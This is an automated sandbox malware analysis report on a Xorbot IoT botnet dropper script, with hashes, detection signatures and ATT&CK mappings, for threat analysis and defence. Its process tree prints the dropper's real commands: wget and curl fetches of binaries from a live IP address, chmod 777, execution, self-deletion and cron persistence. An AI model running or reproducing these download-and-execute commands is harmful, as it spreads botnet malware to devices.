xorbot | 79b5cadd9bb700d3446289f5ac8ecad6f8e606156c382d8ad1b6674f932f448c

Analysis

max time kernel
149s
max time network
151s
platform
debian-9_armhf
resource
debian9-armhf-20240418-en
resource tags

arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
04/01/2025, 23:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

7c714b6d0c1399d40ab78b0317f4334a
SHA1

805134873e170312f57b442b64492c6576988455
SHA256

79b5cadd9bb700d3446289f5ac8ecad6f8e606156c382d8ad1b6674f932f448c
SHA512

0016bc8db531ccca54fe53c2d1f65eb210927fda8fa26f9133942647ff4647e5c86c370a582c398dce2f5cbb78c3774a0baf7faca539fb24c4ce7abebdd29059
SSDEEP

192:F8TJrqjzbDk4gpO2DC+GzDOCC+GzDsTJ4zbDk4A:FUqkpO2Xi

Score

10^/10

xorbot antivm botnet defense_evasion discovery execution persistence privilege_escalatio trojan

Malware Config

Signatures

Detects Xorbot 2 IoCs

botnet trojan

resource	yara_rule
behavioral2/files/fstream-1.dat	family_xorbot
behavioral2/files/fstream-3.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot
Contacts a large (2027) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 2 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
725	chmod
753	chmod

Executes dropped EXE 2 IoCs

ioc	pid	Process
/tmp/hMzWBEzoIY8mOuDWTQ5ZWnT5DTiRGCR3Lq	727	hMzWBEzoIY8mOuDWTQ5ZWnT5DTiRGCR3Lq
/tmp/ialFkFB5FBuqB57nsfHVRUAVUc43b3099G	754	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G

Renames itself 1 IoCs

pid	Process
755	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.WBVzy9	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Checks CPU configuration 1 TTPs 2 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/840/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/918/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/942/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/894/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/935/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/635/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/900/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/807/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/951/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/296/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/797/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/906/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/279/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/870/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/888/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/23/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/265/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/267/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/590/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/899/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/947/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/135/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/778/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/791/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/794/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/860/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/917/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/824/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/16/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/828/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/869/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/875/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/28/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/798/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/915/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/938/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/809/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/864/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/882/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/910/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/20/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/105/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/138/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/838/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/954/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/24/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/572/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/789/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/887/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/909/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/911/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/766/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/770/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/785/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/787/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/839/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/903/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/777/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/930/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/9/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/43/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/874/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
File opened for reading	/proc/108/cmdline	ialFkFB5FBuqB57nsfHVRUAVUc43b3099G

Writes file to tmp directory 6 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/hMzWBEzoIY8mOuDWTQ5ZWnT5DTiRGCR3Lq	curl
File opened for modification	/tmp/hMzWBEzoIY8mOuDWTQ5ZWnT5DTiRGCR3Lq	busybox
File opened for modification	/tmp/ialFkFB5FBuqB57nsfHVRUAVUc43b3099G	wget
File opened for modification	/tmp/ialFkFB5FBuqB57nsfHVRUAVUc43b3099G	curl
File opened for modification	/tmp/ialFkFB5FBuqB57nsfHVRUAVUc43b3099G	busybox
File opened for modification	/tmp/hMzWBEzoIY8mOuDWTQ5ZWnT5DTiRGCR3Lq	wget

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:638
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:640
- /usr/bin/wget
  wget http://66.63.187.225/bins/hMzWBEzoIY8mOuDWTQ5ZWnT5DTiRGCR3Lq
  2⤵
  - Writes file to tmp directory
  PID:642
- /usr/bin/curl
  curl -O http://66.63.187.225/bins/hMzWBEzoIY8mOuDWTQ5ZWnT5DTiRGCR3Lq
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:669
- /bin/busybox
  /bin/busybox wget http://66.63.187.225/bins/hMzWBEzoIY8mOuDWTQ5ZWnT5DTiRGCR3Lq
  2⤵
  - Writes file to tmp directory
  PID:683
- /bin/chmod
  chmod 777 hMzWBEzoIY8mOuDWTQ5ZWnT5DTiRGCR3Lq
  2⤵
  - File and Directory Permissions Modification
  PID:725
- /tmp/hMzWBEzoIY8mOuDWTQ5ZWnT5DTiRGCR3Lq
  ./hMzWBEzoIY8mOuDWTQ5ZWnT5DTiRGCR3Lq
  2⤵
  - Executes dropped EXE
  PID:727
- /bin/rm
  rm hMzWBEzoIY8mOuDWTQ5ZWnT5DTiRGCR3Lq
  2⤵
  PID:729
- /usr/bin/wget
  wget http://66.63.187.225/bins/ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
  2⤵
  - Writes file to tmp directory
  PID:731
- /usr/bin/curl
  curl -O http://66.63.187.225/bins/ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:744
- /bin/busybox
  /bin/busybox wget http://66.63.187.225/bins/ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
  2⤵
  - Writes file to tmp directory
  PID:752
- /bin/chmod
  chmod 777 ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
  2⤵
  - File and Directory Permissions Modification
  PID:753
- /tmp/ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
  ./ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:754
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:756
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:757
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:758
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:759
- /bin/rm
  rm ialFkFB5FBuqB57nsfHVRUAVUc43b3099G
  2⤵
  PID:761
- /usr/bin/wget
  wget http://66.63.187.225/bins/VuJFqTRuPN1LVRoIz8AOjbFTncayrlJn7x
  2⤵
  PID:764

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/hMzWBEzoIY8mOuDWTQ5ZWnT5DTiRGCR3Lq

Filesize
98KB

MD5
5141342d0df8699fa32a6b066a0c592e

SHA1
8157673225bd5182f16215e2aa823a25ca2d4fbc

SHA256
54302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d

SHA512
d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801

Download Submit
/tmp/ialFkFB5FBuqB57nsfHVRUAVUc43b3099G

Filesize
119KB

MD5
1b166b95f9cb4b079ef1b9ec8363ddf3

SHA1
0d8eb08add467b3b5474f9b25909297fe7c2839c

SHA256
94a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9

SHA512
983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925

Download Submit
/var/spool/cron/crontabs/tmp.WBVzy9

Filesize
210B

MD5
d96430c86f982b2554575e6e04e5aa24

SHA1
247591c9bb720af0ec8c0e3b5551637935096b98

SHA256
9c1baa106ec467b5d401b764fe9de08be8b47d498de706926305ebe1035fa8cf

SHA512
c085f14510441684156de99a249927eea680287b35c08055ad77bdde51cd4b61c74d34d811b244bac34d5aa3d5e53013eb8b541a8bd5b8ce731a19f24d8bcef6

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads